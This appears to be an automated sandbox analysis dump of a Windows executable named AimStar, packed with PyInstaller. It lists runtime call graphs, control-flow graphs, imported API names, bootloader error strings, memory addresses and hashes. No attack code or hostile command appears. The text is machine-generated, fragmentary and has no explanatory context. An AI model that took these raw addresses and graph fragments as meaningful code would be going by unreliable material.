7ff710f56ac4 18740->18743 18750 7ff710f60008 18740->18750 18745 7ff710f5ffd8 18741->18745 18743->18724 18746 7ff710f5b1c0 _CreateFrameInfo 45 API calls 18745->18746 18747 7ff710f5ffe1 18746->18747 18751 7ff710f54fbc 45 API calls 18750->18751 18753 7ff710f60041 18751->18753 18752 7ff710f6004d 18753->18752 18757 7ff710f62eb0 18753->18757 18791->16565 18793 7ff710f5b1c0 _CreateFrameInfo 45 API calls 18792->18793 18794 7ff710f5a451 18793->18794 18797 7ff710f5a574 18794->18797 18806 7ff710f636c0 18797->18806 18832 7ff710f63678 18806->18832 18837 7ff710f60348 EnterCriticalSection 18832->18837 19084 7ff710f5b040 19085 7ff710f5b045 19084->19085 19086 7ff710f5b05a 19084->19086 19090 7ff710f5b060 19085->19090 19091 7ff710f5b0aa 19090->19091 19092 7ff710f5b0a2 19090->19092 19094 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19091->19094 19093 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19092->19093 19093->19091 19095 7ff710f5b0b7 19094->19095 19096 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19095->19096 19097 7ff710f5b0c4 19096->19097 19098 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19097->19098 19099 7ff710f5b0d1 19098->19099 19100 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19099->19100 19101 7ff710f5b0de 19100->19101 19102 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19101->19102 19103 7ff710f5b0eb 19102->19103 19104 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19103->19104 19105 7ff710f5b0f8 19104->19105 19106 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19105->19106 19107 7ff710f5b105 19106->19107 19108 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19107->19108 19109 7ff710f5b115 19108->19109 19110 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19109->19110 19111 7ff710f5b125 19110->19111 19116 7ff710f5af04 19111->19116 19130 7ff710f60348 EnterCriticalSection 19116->19130 20529 7ff710f59dc0 20532 7ff710f59d3c 20529->20532 20539 7ff710f60348 EnterCriticalSection 20532->20539 20543 7ff710f4cbc0 20544 7ff710f4cbd0 20543->20544 20560 7ff710f59c18 20544->20560 20546 7ff710f4cbdc 20566 7ff710f4ceb8 20546->20566 20548 7ff710f4d19c 7 API calls 20549 7ff710f4cc75 20548->20549 20550 7ff710f4cbf4 _RTC_Initialize 20558 7ff710f4cc49 20550->20558 20571 7ff710f4d068 20550->20571 20552 7ff710f4cc09 20574 7ff710f59084 20552->20574 20558->20548 20559 7ff710f4cc65 20558->20559 20561 7ff710f59c29 20560->20561 20562 7ff710f59c31 20561->20562 20563 7ff710f54f78 _set_fmode 11 API calls 20561->20563 20562->20546 20564 7ff710f59c40 20563->20564 20565 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 20564->20565 20565->20562 20567 7ff710f4cec9 20566->20567 20570 7ff710f4cece __scrt_release_startup_lock 20566->20570 20568 7ff710f4d19c 7 API calls 20567->20568 20567->20570 20569 7ff710f4cf42 20568->20569 20570->20550 20599 7ff710f4d02c 20571->20599 20573 7ff710f4d071 20573->20552 20575 7ff710f590a4 20574->20575 20576 7ff710f4cc15 20574->20576 20577 7ff710f590ac 20575->20577 20578 7ff710f590c2 GetModuleFileNameW 20575->20578 20576->20558 20598 7ff710f4d13c InitializeSListHead 20576->20598 20579 7ff710f54f78 _set_fmode 11 API calls 20577->20579 20582 7ff710f590ed 20578->20582 20580 7ff710f590b1 20579->20580 20581 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 20580->20581 20581->20576 20583 7ff710f59024 11 API calls 20582->20583 20584 7ff710f5912d 20583->20584 20585 7ff710f59135 20584->20585 20588 7ff710f5914d 20584->20588 20586 7ff710f54f78 _set_fmode 11 API calls 20585->20586 20587 7ff710f5913a 20586->20587 20590 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20587->20590 20589 7ff710f5916f 20588->20589 20592 7ff710f5919b 20588->20592 20593 7ff710f591b4 20588->20593 20591 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20589->20591 20590->20576 20591->20576 20594 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20592->20594 20596 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20593->20596 20595 7ff710f591a4 20594->20595 20597 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20595->20597 20596->20589 20597->20576 20600 7ff710f4d046 20599->20600 20602 7ff710f4d03f 20599->20602 20603 7ff710f5a25c 20600->20603 20602->20573 20606 7ff710f59e98 20603->20606 20613 7ff710f60348 EnterCriticalSection 20606->20613 19132 7ff710f6ac53 19133 7ff710f6ac63 19132->19133 19136 7ff710f554e8 LeaveCriticalSection 19133->19136 18954 7ff710f4bb50 18955 7ff710f4bb7e 18954->18955 18956 7ff710f4bb65 18954->18956 18956->18955 18958 7ff710f5d66c 12 API calls 18956->18958 18957 7ff710f4bbde 18958->18957 18959 7ff710f599d1 18960 7ff710f5a448 45 API calls 18959->18960 18961 7ff710f599d6 18960->18961 18962 7ff710f599fd GetModuleHandleW 18961->18962 18963 7ff710f59a47 18961->18963 18962->18963 18969 7ff710f59a0a 18962->18969 18971 7ff710f598d4 18963->18971 18969->18963 18985 7ff710f59af8 GetModuleHandleExW 18969->18985 18991 7ff710f60348 EnterCriticalSection 18971->18991 18986 7ff710f59b2c GetProcAddress 18985->18986 18987 7ff710f59b55 18985->18987 18988 7ff710f59b3e 18986->18988 18989 7ff710f59b5a FreeLibrary 18987->18989 18990 7ff710f59b61 18987->18990 18988->18987 18989->18990 18990->18963 20650 7ff710f6add9 20653 7ff710f554e8 LeaveCriticalSection 20650->20653 19138 7ff710f6ae6e 19139 7ff710f6ae7d 19138->19139 19140 7ff710f6ae87 19138->19140 19142 7ff710f603a8 LeaveCriticalSection 19139->19142 20735 7ff710f5f9fc 20736 7ff710f5fbee 20735->20736 20738 7ff710f5fa3e _isindst 20735->20738 20737 7ff710f54f78 _set_fmode 11 API calls 20736->20737 20755 7ff710f5fbde 20737->20755 20738->20736 20741 7ff710f5fabe _isindst 20738->20741 20739 7ff710f4c5c0 _log10_special 8 API calls 20740 7ff710f5fc09 20739->20740 20756 7ff710f66204 20741->20756 20746 7ff710f5fc1a 20748 7ff710f5a970 _isindst 17 API calls 20746->20748 20750 7ff710f5fc2e 20748->20750 20753 7ff710f5fb1b 20753->20755 20781 7ff710f66248 20753->20781 20755->20739 20757 7ff710f66213 20756->20757 20758 7ff710f5fadc 20756->20758 20788 7ff710f60348 EnterCriticalSection 20757->20788 20763 7ff710f65608 20758->20763 20764 7ff710f5faf1 20763->20764 20765 7ff710f65611 20763->20765 20764->20746 20769 7ff710f65638 20764->20769 20766 7ff710f54f78 _set_fmode 11 API calls 20765->20766 20767 7ff710f65616 20766->20767 20768 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 20767->20768 20768->20764 20770 7ff710f5fb02 20769->20770 20771 7ff710f65641 20769->20771 20770->20746 20775 7ff710f65668 20770->20775 20772 7ff710f54f78 _set_fmode 11 API calls 20771->20772 20773 7ff710f65646 20772->20773 20774 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 20773->20774 20774->20770 20776 7ff710f5fb13 20775->20776 20777 7ff710f65671 20775->20777 20776->20746 20776->20753 20778 7ff710f54f78 _set_fmode 11 API calls 20777->20778 20779 7ff710f65676 20778->20779 20780 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 20779->20780 20780->20776 20789 7ff710f60348 EnterCriticalSection 20781->20789 19156 7ff710f55480 19157 7ff710f5548b 19156->19157 19165 7ff710f5f314 19157->19165 19178 7ff710f60348 EnterCriticalSection 19165->19178 19179 7ff710f67c90 19182 7ff710f62660 19179->19182 19183 7ff710f6266d 19182->19183 19187 7ff710f626b2 19182->19187 19188 7ff710f5b294 19183->19188 19189 7ff710f5b2a5 FlsGetValue 19188->19189 19190 7ff710f5b2c0 FlsSetValue 19188->19190 19191 7ff710f5b2ba 19189->19191 19192 7ff710f5b2b2 19189->19192 19190->19192 19193 7ff710f5b2cd 19190->19193 19191->19190 19194 7ff710f5b2b8 19192->19194 19195 7ff710f5a574 _CreateFrameInfo 45 API calls 19192->19195 19196 7ff710f5ec08 _set_fmode 11 API calls 19193->19196 19208 7ff710f62334 19194->19208 19197 7ff710f5b335 19195->19197 19198 7ff710f5b2dc 19196->19198 19199 7ff710f5b2fa FlsSetValue 19198->19199 19200 7ff710f5b2ea FlsSetValue 19198->19200 19201 7ff710f5b318 19199->19201 19202 7ff710f5b306 FlsSetValue 19199->19202 19203 7ff710f5b2f3 19200->19203 19204 7ff710f5af64 _set_fmode 11 API calls 19201->19204 19202->19203 19205 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19203->19205 19206 7ff710f5b320 19204->19206 19205->19192 19207 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19206->19207 19207->19194 19231 7ff710f625a4 19208->19231 19210 7ff710f62369 19246 7ff710f62034 19210->19246 19213 7ff710f62386 19213->19187 19214 7ff710f5d66c _fread_nolock 12 API calls 19215 7ff710f62397 19214->19215 19216 7ff710f6239f 19215->19216 19218 7ff710f623ae 19215->19218 19217 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19216->19217 19217->19213 19218->19218 19253 7ff710f626dc 19218->19253 19221 7ff710f624aa 19222 7ff710f54f78 _set_fmode 11 API calls 19221->19222 19223 7ff710f624af 19222->19223 19225 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19223->19225 19224 7ff710f62505 19227 7ff710f6256c 19224->19227 19264 7ff710f61e64 19224->19264 19225->19213 19226 7ff710f624c4 19226->19224 19229 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19226->19229 19228 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19227->19228 19228->19213 19229->19224 19232 7ff710f625c7 19231->19232 19233 7ff710f625d1 19232->19233 19279 7ff710f60348 EnterCriticalSection 19232->19279 19235 7ff710f62643 19233->19235 19238 7ff710f5a574 _CreateFrameInfo 45 API calls 19233->19238 19235->19210 19239 7ff710f6265b 19238->19239 19241 7ff710f626b2 19239->19241 19243 7ff710f5b294 50 API calls 19239->19243 19241->19210 19244 7ff710f6269c 19243->19244 19245 7ff710f62334 65 API calls 19244->19245 19245->19241 19247 7ff710f54fbc 45 API calls 19246->19247 19248 7ff710f62048 19247->19248 19249 7ff710f62054 GetOEMCP 19248->19249 19250 7ff710f62066 19248->19250 19251 7ff710f6207b 19249->19251 19250->19251 19252 7ff710f6206b GetACP 19250->19252 19251->19213 19251->19214 19252->19251 19254 7ff710f62034 47 API calls 19253->19254 19255 7ff710f62709 19254->19255 19256 7ff710f6285f 19255->19256 19257 7ff710f62746 IsValidCodePage 19255->19257 19263 7ff710f62760 __scrt_get_show_window_mode 19255->19263 19258 7ff710f4c5c0 _log10_special 8 API calls 19256->19258 19257->19256 19259 7ff710f62757 19257->19259 19260 7ff710f624a1 19258->19260 19261 7ff710f62786 GetCPInfo 19259->19261 19259->19263 19260->19221 19260->19226 19261->19256 19261->19263 19280 7ff710f6214c 19263->19280 19336 7ff710f60348 EnterCriticalSection 19264->19336 19281 7ff710f62189 GetCPInfo 19280->19281 19282 7ff710f6227f 19280->19282 19281->19282 19287 7ff710f6219c 19281->19287 19283 7ff710f4c5c0 _log10_special 8 API calls 19282->19283 19284 7ff710f6231e 19283->19284 19284->19256 19285 7ff710f62eb0 48 API calls 19286 7ff710f62213 19285->19286 19291 7ff710f67bf4 19286->19291 19287->19285 19290 7ff710f67bf4 54 API calls 19290->19282 19292 7ff710f54fbc 45 API calls 19291->19292 19293 7ff710f67c19 19292->19293 19296 7ff710f678c0 19293->19296 19297 7ff710f67901 19296->19297 19298 7ff710f5f910 _fread_nolock MultiByteToWideChar 19297->19298 19302 7ff710f6794b 19298->19302 19299 7ff710f67bc9 19301 7ff710f4c5c0 _log10_special 8 API calls 19299->19301 19300 7ff710f67a81 19300->19299 19305 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19300->19305 19303 7ff710f62246 19301->19303 19302->19299 19302->19300 19304 7ff710f5d66c _fread_nolock 12 API calls 19302->19304 19306 7ff710f67983 19302->19306 19303->19290 19304->19306 19305->19299 19306->19300 19307 7ff710f5f910 _fread_nolock MultiByteToWideChar 19306->19307 19308 7ff710f679f6 19307->19308 19308->19300 19327 7ff710f5f154 19308->19327 19311 7ff710f67a92 19313 7ff710f5d66c _fread_nolock 12 API calls 19311->19313 19315 7ff710f67b64 19311->19315 19316 7ff710f67ab0 19311->19316 19312 7ff710f67a41 19312->19300 19314 7ff710f5f154 __crtLCMapStringW 6 API calls 19312->19314 19313->19316 19314->19300 19315->19300 19317 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19315->19317 19316->19300 19318 7ff710f5f154 __crtLCMapStringW 6 API calls 19316->19318 19317->19300 19319 7ff710f67b30 19318->19319 19319->19315 19320 7ff710f67b66 19319->19320 19321 7ff710f67b50 19319->19321 19322 7ff710f60858 WideCharToMultiByte 19320->19322 19323 7ff710f60858 WideCharToMultiByte 19321->19323 19324 7ff710f67b5e 19322->19324 19323->19324 19324->19315 19325 7ff710f67b7e 19324->19325 19325->19300 19326 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19325->19326 19326->19300 19328 7ff710f5ed80 __crtLCMapStringW 5 API calls 19327->19328 19329 7ff710f5f192 19328->19329 19330 7ff710f5f19a 19329->19330 19333 7ff710f5f240 19329->19333 19330->19300 19330->19311 19330->19312 19332 7ff710f5f203 LCMapStringW 19332->19330 19334 7ff710f5ed80 __crtLCMapStringW 5 API calls 19333->19334 19335 7ff710f5f26e __crtLCMapStringW 19334->19335 19335->19332 20470 7ff710f5c590 20481 7ff710f60348 EnterCriticalSection 20470->20481

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 0 7ff710f48bd0-7ff710f48d16 call 7ff710f4c8c0 call 7ff710f49400 SetConsoleCtrlHandler GetStartupInfoW call 7ff710f55460 call 7ff710f5a4ec call 7ff710f5878c call 7ff710f55460 call 7ff710f5a4ec call 7ff710f5878c call 7ff710f55460 call 7ff710f5a4ec call 7ff710f5878c GetCommandLineW CreateProcessW 23 7ff710f48d3d-7ff710f48d79 RegisterClassW 0->23 24 7ff710f48d18-7ff710f48d38 GetLastError call 7ff710f42c50 0->24 26 7ff710f48d7b GetLastError 23->26 27 7ff710f48d81-7ff710f48dd5 CreateWindowExW 23->27 31 7ff710f49029-7ff710f4904f call 7ff710f4c5c0 24->31 26->27 29 7ff710f48dd7-7ff710f48ddd GetLastError 27->29 30 7ff710f48ddf-7ff710f48de4 ShowWindow 27->30 32 7ff710f48dea-7ff710f48dfa WaitForSingleObject 29->32 30->32 34 7ff710f48dfc 32->34 35 7ff710f48e78-7ff710f48e7f 32->35 39 7ff710f48e00-7ff710f48e03 34->39 36 7ff710f48e81-7ff710f48e91 WaitForSingleObject 35->36 37 7ff710f48ec2-7ff710f48ec9 35->37 40 7ff710f48e97-7ff710f48ea7 TerminateProcess 36->40 41 7ff710f48fe8-7ff710f48ff2 36->41 42 7ff710f48ecf-7ff710f48ee5 QueryPerformanceFrequency QueryPerformanceCounter 37->42 43 7ff710f48fb0-7ff710f48fc9 GetMessageW 37->43 44 7ff710f48e0b-7ff710f48e12 39->44 45 7ff710f48e05 GetLastError 39->45 48 7ff710f48ea9 GetLastError 40->48 49 7ff710f48eaf-7ff710f48ebd WaitForSingleObject 40->49 46 7ff710f48ff4-7ff710f48ffa DestroyWindow 41->46 47 7ff710f49001-7ff710f49025 GetExitCodeProcess CloseHandle * 2 41->47 50 7ff710f48ef0-7ff710f48f28 MsgWaitForMultipleObjects PeekMessageW 42->50 52 7ff710f48fcb-7ff710f48fd9 TranslateMessage DispatchMessageW 43->52 53 7ff710f48fdf-7ff710f48fe6 43->53 44->36 51 7ff710f48e14-7ff710f48e31 PeekMessageW 44->51 45->44 46->47 47->31 48->49 49->41 54 7ff710f48f2a 50->54 55 7ff710f48f63-7ff710f48f6a 50->55 56 7ff710f48e33-7ff710f48e64 TranslateMessage DispatchMessageW PeekMessageW 51->56 57 7ff710f48e66-7ff710f48e76 WaitForSingleObject 51->57 52->53 53->41 53->43 58 7ff710f48f30-7ff710f48f61 TranslateMessage DispatchMessageW PeekMessageW 54->58 55->43 59 7ff710f48f6c-7ff710f48f95 QueryPerformanceCounter 55->59 56->56 56->57 57->35 57->39 58->55 58->58 59->50 60 7ff710f48f9b-7ff710f48fa2 59->60 60->41 61 7ff710f48fa4-7ff710f48fa8 60->61 61->43
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                          • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                          • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                          • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                          • Instruction ID: 5a1935e71967dfe1f238cb7eb0dda82a2f9294084112d9e6eda8353df3499aa7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51D17036A0CE8686E710AF74E8566ADB768FB84B68F800235DE5D437A5DF3CE149C710

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 62 7ff710f41000-7ff710f43806 call 7ff710f4fe88 call 7ff710f4fe90 call 7ff710f4c8c0 call 7ff710f55460 call 7ff710f554f4 call 7ff710f436b0 76 7ff710f43808-7ff710f4380f 62->76 77 7ff710f43814-7ff710f43836 call 7ff710f41950 62->77 78 7ff710f43c97-7ff710f43cb2 call 7ff710f4c5c0 76->78 82 7ff710f4383c-7ff710f43856 call 7ff710f41c80 77->82 83 7ff710f4391b-7ff710f43931 call 7ff710f445b0 77->83 87 7ff710f4385b-7ff710f4389b call 7ff710f48a20 82->87 89 7ff710f4396a-7ff710f4397f call 7ff710f42710 83->89 90 7ff710f43933-7ff710f43960 call 7ff710f47f80 83->90 97 7ff710f4389d-7ff710f438a3 87->97 98 7ff710f438c1-7ff710f438cc call 7ff710f54fa0 87->98 102 7ff710f43c8f 89->102 100 7ff710f43962-7ff710f43965 call 7ff710f500bc 90->100 101 7ff710f43984-7ff710f439a6 call 7ff710f41c80 90->101 103 7ff710f438af-7ff710f438bd call 7ff710f48b90 97->103 104 7ff710f438a5-7ff710f438ad 97->104 109 7ff710f439fc-7ff710f43a2a call 7ff710f48b30 call 7ff710f48b90 * 3 98->109 110 7ff710f438d2-7ff710f438e1 call 7ff710f48a20 98->110 100->89 115 7ff710f439b0-7ff710f439b9 101->115 102->78 103->98 104->103 138 7ff710f43a2f-7ff710f43a3e call 7ff710f48a20 109->138 119 7ff710f438e7-7ff710f438ed 110->119 120 7ff710f439f4-7ff710f439f7 call 7ff710f54fa0 110->120 115->115 118 7ff710f439bb-7ff710f439d8 call 7ff710f41950 115->118 118->87 130 7ff710f439de-7ff710f439ef call 7ff710f42710 118->130 124 7ff710f438f0-7ff710f438fc 119->124 120->109 127 7ff710f438fe-7ff710f43903 124->127 128 7ff710f43905-7ff710f43908 124->128 127->124 127->128 128->120 132 7ff710f4390e-7ff710f43916 call 7ff710f54fa0 128->132 130->102 132->138 141 7ff710f43b45-7ff710f43b53 138->141 142 7ff710f43a44-7ff710f43a47 138->142 144 7ff710f43b59-7ff710f43b5d 141->144 145 7ff710f43a67 141->145 142->141 143 7ff710f43a4d-7ff710f43a50 142->143 146 7ff710f43a56-7ff710f43a5a 143->146 147 7ff710f43b14-7ff710f43b17 143->147 148 7ff710f43a6b-7ff710f43a90 call 7ff710f54fa0 144->148 145->148 146->147 149 7ff710f43a60 146->149 150 7ff710f43b19-7ff710f43b1d 147->150 151 7ff710f43b2f-7ff710f43b40 call 7ff710f42710 147->151 157 7ff710f43aab-7ff710f43ac0 148->157 158 7ff710f43a92-7ff710f43aa6 call 7ff710f48b30 148->158 149->145 150->151 153 7ff710f43b1f-7ff710f43b2a 150->153 159 7ff710f43c7f-7ff710f43c87 151->159 153->148 161 7ff710f43be8-7ff710f43bfa call 7ff710f48a20 157->161 162 7ff710f43ac6-7ff710f43aca 157->162 158->157 159->102 170 7ff710f43c2e 161->170 171 7ff710f43bfc-7ff710f43c02 161->171 164 7ff710f43bcd-7ff710f43be2 call 7ff710f41940 162->164 165 7ff710f43ad0-7ff710f43ae8 call 7ff710f552c0 162->165 164->161 164->162 176 7ff710f43aea-7ff710f43b02 call 7ff710f552c0 165->176 177 7ff710f43b62-7ff710f43b7a call 7ff710f552c0 165->177 173 7ff710f43c31-7ff710f43c40 call 7ff710f54fa0 170->173 174 7ff710f43c1e-7ff710f43c2c 171->174 175 7ff710f43c04-7ff710f43c1c 171->175 185 7ff710f43d41-7ff710f43d63 call 7ff710f444d0 173->185 186 7ff710f43c46-7ff710f43c4a 173->186 174->173 175->173 176->164 184 7ff710f43b08-7ff710f43b0f 176->184 187 7ff710f43b87-7ff710f43b9f call 7ff710f552c0 177->187 188 7ff710f43b7c-7ff710f43b80 177->188 184->164 201 7ff710f43d71-7ff710f43d82 call 7ff710f41c80 185->201 202 7ff710f43d65-7ff710f43d6f call 7ff710f44620 185->202 189 7ff710f43c50-7ff710f43c5f call 7ff710f490e0 186->189 190 7ff710f43cd4-7ff710f43ce6 call 7ff710f48a20 186->190 197 7ff710f43bac-7ff710f43bc4 call 7ff710f552c0 187->197 198 7ff710f43ba1-7ff710f43ba5 187->198 188->187 204 7ff710f43c61 189->204 205 7ff710f43cb3-7ff710f43cb6 call 7ff710f48850 189->205 206 7ff710f43ce8-7ff710f43ceb 190->206 207 7ff710f43d35-7ff710f43d3c 190->207 197->164 217 7ff710f43bc6 197->217 198->197 215 7ff710f43d87-7ff710f43d96 201->215 202->215 212 7ff710f43c68 call 7ff710f42710 204->212 216 7ff710f43cbb-7ff710f43cbd 205->216 206->207 213 7ff710f43ced-7ff710f43d10 call 7ff710f41c80 206->213 207->212 225 7ff710f43c6d-7ff710f43c77 212->225 230 7ff710f43d2b-7ff710f43d33 call 7ff710f54fa0 213->230 231 7ff710f43d12-7ff710f43d26 call 7ff710f42710 call 7ff710f54fa0 213->231 220 7ff710f43d98-7ff710f43d9f 215->220 221 7ff710f43dc4-7ff710f43dda call 7ff710f49400 215->221 223 7ff710f43cc8-7ff710f43ccf 216->223 224 7ff710f43cbf-7ff710f43cc6 216->224 217->164 220->221 227 7ff710f43da1-7ff710f43da5 220->227 233 7ff710f43de8-7ff710f43e04 SetDllDirectoryW 221->233 234 7ff710f43ddc 221->234 223->215 224->212 225->159 227->221 228 7ff710f43da7-7ff710f43dbe SetDllDirectoryW LoadLibraryExW 227->228 228->221 230->215 231->225 237 7ff710f43e0a-7ff710f43e19 call 7ff710f48a20 233->237 238 7ff710f43f01-7ff710f43f08 233->238 234->233 251 7ff710f43e1b-7ff710f43e21 237->251 252 7ff710f43e32-7ff710f43e3c call 7ff710f54fa0 237->252 240 7ff710f43f0e-7ff710f43f15 238->240 241 7ff710f43ffc-7ff710f44004 238->241 240->241 245 7ff710f43f1b-7ff710f43f25 call 7ff710f433c0 240->245 246 7ff710f44029-7ff710f4405b call 7ff710f436a0 call 7ff710f43360 call 7ff710f43670 call 7ff710f46fb0 call 7ff710f46d60 241->246 247 7ff710f44006-7ff710f44023 PostMessageW GetMessageW 241->247 245->225 258 7ff710f43f2b-7ff710f43f3f call 7ff710f490c0 245->258 247->246 255 7ff710f43e2d-7ff710f43e2f 251->255 256 7ff710f43e23-7ff710f43e2b 251->256 261 7ff710f43ef2-7ff710f43efc call 7ff710f48b30 252->261 262 7ff710f43e42-7ff710f43e48 252->262 255->252 256->255 271 7ff710f43f41-7ff710f43f5e PostMessageW GetMessageW 258->271 272 7ff710f43f64-7ff710f43fa0 call 7ff710f48b30 call 7ff710f48bd0 call 7ff710f46fb0 call 7ff710f46d60 call 7ff710f48ad0 258->272 261->238 262->261 266 7ff710f43e4e-7ff710f43e54 262->266 269 7ff710f43e5f-7ff710f43e61 266->269 270 7ff710f43e56-7ff710f43e58 266->270 269->238 275 7ff710f43e67-7ff710f43e83 call 7ff710f46db0 call 7ff710f47330 269->275 274 7ff710f43e5a 270->274 270->275 271->272 306 7ff710f43fa5-7ff710f43fa7 272->306 274->238 290 7ff710f43e8e-7ff710f43e95 275->290 291 7ff710f43e85-7ff710f43e8c 275->291 294 7ff710f43e97-7ff710f43ea4 call 7ff710f46df0 290->294 295 7ff710f43eaf-7ff710f43eb9 call 7ff710f471a0 290->295 293 7ff710f43edb-7ff710f43ef0 call 7ff710f42a50 call 7ff710f46fb0 call 7ff710f46d60 291->293 293->238 294->295 308 7ff710f43ea6-7ff710f43ead 294->308 304 7ff710f43ebb-7ff710f43ec2 295->304 305 7ff710f43ec4-7ff710f43ed2 call 7ff710f474e0 295->305 304->293 305->238 318 7ff710f43ed4 305->318 310 7ff710f43fe9-7ff710f43ff7 call 7ff710f41900 306->310 311 7ff710f43fa9-7ff710f43fb3 call 7ff710f49200 306->311 308->293 310->225 311->310 321 7ff710f43fb5-7ff710f43fca 311->321 318->293 322 7ff710f43fcc-7ff710f43fdf call 7ff710f42710 call 7ff710f41900 321->322 323 7ff710f43fe4 call 7ff710f42a50 321->323 322->225 323->310
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                          • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child 